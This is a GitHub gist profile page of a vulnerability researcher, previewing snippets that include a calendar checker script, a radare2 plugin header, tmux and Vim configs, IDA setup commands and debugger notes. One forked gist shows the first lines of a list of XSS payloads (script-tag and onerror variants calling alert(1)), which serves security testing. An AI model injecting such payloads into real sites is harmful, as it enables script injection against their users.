Skip to content

Instantly share code, notes, and snippets.

View Stolas's full-sized avatar
🕵️‍♂️
Researching Vulnerabilities

Stolas Stolas

🕵️‍♂️
Researching Vulnerabilities
  • The Netherlands
View GitHub Profile
@Stolas
Stolas / vekn_alert.py
Created September 16, 2023 08:36
VEKN Cal Checker
#!/usr/bin/env python
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
from dateutil.relativedelta import *
import time
def get_events(countires, future_months=3):
events = []
/* radare - LGPL - Copyright 2019 - stolas */
#include <r_types.h>
#include <r_util.h>
#include <r_lib.h>
#include <r_bin.h>
#include <r_magic.h>
typedef struct {
ut32 magic;
# Default terminal
set-option -g default-terminal "screen-256color"
# Use vim key bindings
set-option -g mode-keys vi
set-option -g status-keys vi
# Turn the mouse on
set-option -g mouse on
@Stolas
Stolas / Ledger.txt
Last active March 6, 2017 10:29
Ledger Categories
Equity:Opening
Assets:Cash
Assets:Checking
Assets:Saving
Expenses:Adjustment
Expenses:Auto:Fees
Expenses:Auto:Gas
Expenses:Auto:Parking
# Run this in the IDA Directory:
wget https://raw.githubusercontent.com/Stolas/solarized_ida/master/solarized_dark.clr
wget https://raw.githubusercontent.com/Stolas/ida-sploiter/master/idasploiter.py -o plugins/idasploiter.py
zypper in libgthread-2_0-0-32bit libfreetype6-32bit libgobject-2_0-0-32bit libSM6-32bit libXrender1-32bit fontconfig-32bit libXext6-32bit
IDA Pro -- Main Disassembler -- https://www.hex-rays.com/products/ida/
windbg -- Main Debugger -- https://developer.microsoft.com/en-us/windows/hardware/windows-driver-kit
Intel PIN -- Binary Instrumentation -- https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool
Scylla -- https://github.com/NtQuery/Scylla/releases
Any decent C compiler.
-- ToDo --
Bochs -- http://bochs.sourceforge.net/getcurrent.html
Unicorn Engine -- http://www.unicorn-engine.org/
@Stolas
Stolas / 666_lines_of_XSS_vectors.html
Created June 17, 2016 10:51 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@Stolas
Stolas / switchfont.vim
Last active June 8, 2016 07:14
Easy Switch Fonts - Vim
let g:font = 1
function! ToggleFont()
if g:font > 0
let g:font = 0
set guifont=GohuFont\ 10
else
let g:font = 1
set guifont=Courier\ New\ Bold\ 14
endif
endfunction
SETUP
------------------------------------------------------
------------------------------------------------------
CONTROL FLOW
c - continue
s - step
set step-mode off -- Toggle Step Over
show step-mode -- Show Step Mode.